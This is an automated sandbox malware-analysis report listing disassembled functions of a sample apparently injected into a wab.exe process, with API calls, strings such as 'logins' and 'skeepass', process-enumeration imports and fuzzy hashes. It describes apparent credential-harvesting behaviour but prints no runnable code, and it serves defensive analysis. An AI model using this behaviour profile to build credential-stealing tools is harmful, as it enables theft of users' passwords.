                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                        • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                        • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                      • String ID: logins$null
                      • API String ID: 3492182834-2163367763
                      • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                      • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                      • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                      • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                      Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                      • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                      • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                      • memset.MSVCRT ref: 004085CF
                      • memset.MSVCRT ref: 004085F1
                      • memset.MSVCRT ref: 00408606
                      • strcmp.MSVCRT ref: 00408645
                      • _mbscpy.MSVCRT ref: 004086DB
                      • _mbscpy.MSVCRT ref: 004086FA
                      • memset.MSVCRT ref: 0040870E
                      • strcmp.MSVCRT ref: 0040876B
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                      • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                      • String ID: ---
                      • API String ID: 3437578500-2854292027
                      • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                      • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                      • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                      • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                      Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 0041087D
                      • memset.MSVCRT ref: 00410892
                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                      • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                      • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                      • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                      • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                      • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                      • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                      • GetSysColor.USER32(0000000F), ref: 00410999
                      • DeleteObject.GDI32(?), ref: 004109D0
                      • DeleteObject.GDI32(?), ref: 004109D6
                      • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                      • String ID:
                      • API String ID: 1010922700-0
                      • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                      • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                      • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                      • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                      Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                      • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                      • malloc.MSVCRT ref: 004186B7
                      • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                      • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                      • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                      • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                      • malloc.MSVCRT ref: 004186FE
                      • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                      • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                      • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                      • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@$FullNamePath$malloc$Version
                      • String ID: |A
                      • API String ID: 4233704886-1717621600
                      • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                      • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                      • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                      • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                      Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: _wcsicmp
                      • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                      • API String ID: 2081463915-1959339147
                      • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                      • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                      • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                      • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                      Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                      • FreeLibrary.KERNEL32(00000000), ref: 00413951
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                      • API String ID: 2012295524-70141382
                      • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                      • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                      • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                      • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                      Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                      • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                      • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                      • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                      • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: AddressProc$HandleModule
                      • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                      • API String ID: 667068680-3953557276
                      • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                      • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                      • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                      • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                      Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetDC.USER32(00000000), ref: 004121FF
                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                      • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                      • SetBkMode.GDI32(?,00000001), ref: 00412232
                      • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                      • SelectObject.GDI32(?,?), ref: 00412251
                      • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                      • SelectObject.GDI32(00000014,00000005), ref: 00412291
                        • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                        • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                        • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                      • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                      • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                      • SetCursor.USER32(00000000), ref: 004122BC
                      • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                      • memcpy.MSVCRT ref: 0041234D
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                      • String ID:
                      • API String ID: 1700100422-0
                      • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                      • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                      • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                      • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                      Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                      Download Yara Rule
                      APIs
                      • GetClientRect.USER32(?,?), ref: 004111E0
                      • GetWindowRect.USER32(?,?), ref: 004111F6
                      • GetWindowRect.USER32(?,?), ref: 0041120C
                      • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                      • GetWindowRect.USER32(00000000), ref: 0041124D
                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                      • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                      • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                      • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                      • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                      • EndDeferWindowPos.USER32(?), ref: 0041130B
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Window$Defer$Rect$BeginClientItemPoints
                      • String ID:
                      • API String ID: 552707033-0
                      • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                      • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                      • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                      • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                      Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                        • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                        • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                      • memcpy.MSVCRT ref: 0040C11B
                      • strchr.MSVCRT ref: 0040C140
                      • strchr.MSVCRT ref: 0040C151
                      • _strlwr.MSVCRT ref: 0040C15F
                      • memset.MSVCRT ref: 0040C17A
                      • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                      • String ID: 4$h
                      • API String ID: 4066021378-1856150674
                      • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                      • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                      • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                      • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                      Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$_snwprintf
                      • String ID: %%0.%df
                      • API String ID: 3473751417-763548558
                      • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                      • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                      • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                      • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                      Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                      Download Yara Rule
                      APIs
                      • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                      • KillTimer.USER32(?,00000041), ref: 004060D7
                      • KillTimer.USER32(?,00000041), ref: 004060E8
                      • GetTickCount.KERNEL32 ref: 0040610B
                      • GetParent.USER32(?), ref: 00406136
                      • SendMessageW.USER32(00000000), ref: 0040613D
                      • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                      • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                      • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                      • String ID: A
                      • API String ID: 2892645895-3554254475
                      • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                      • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                      • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                      • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                      Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                      Download Yara Rule
                      APIs
                      • LoadMenuW.USER32(?,?), ref: 0040D97F
                        • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                        • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                        • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                        • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                      • DestroyMenu.USER32(00000000), ref: 0040D99D
                      • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                      • GetDesktopWindow.USER32 ref: 0040D9FD
                      • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                      • memset.MSVCRT ref: 0040DA23
                      • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                      • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                      • DestroyWindow.USER32(00000005), ref: 0040DA70
                        • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                      • String ID: caption
                      • API String ID: 973020956-4135340389
                      • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                      • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                      • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                      • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                      Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                      • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                      • <table dir="rtl"><tr><td>, xrefs: 00410B00
                      • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$_snwprintf$wcscpy
                      • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                      • API String ID: 1283228442-2366825230
                      • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                      • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                      • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                      • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                      Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                      Download Yara Rule
                      APIs
                      • wcschr.MSVCRT ref: 00413972
                      • wcscpy.MSVCRT ref: 00413982
                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                      • wcscpy.MSVCRT ref: 004139D1
                      • wcscat.MSVCRT ref: 004139DC
                      • memset.MSVCRT ref: 004139B8
                        • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                        • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                      • memset.MSVCRT ref: 00413A00
                      • memcpy.MSVCRT ref: 00413A1B
                      • wcscat.MSVCRT ref: 00413A27
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                      • String ID: \systemroot
                      • API String ID: 4173585201-1821301763
                      • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                      • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                      • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                      • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                      Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: wcscpy
                      • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                      • API String ID: 1284135714-318151290
                      • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                      • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                      • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                      • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                      Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                      • String ID: 0$6
                      • API String ID: 4066108131-3849865405
                      • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                      • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                      • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                      • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                      Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 004082EF
                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                      • memset.MSVCRT ref: 00408362
                      • memset.MSVCRT ref: 00408377
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$ByteCharMultiWide
                      • String ID:
                      • API String ID: 290601579-0
                      • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                      • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                      • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
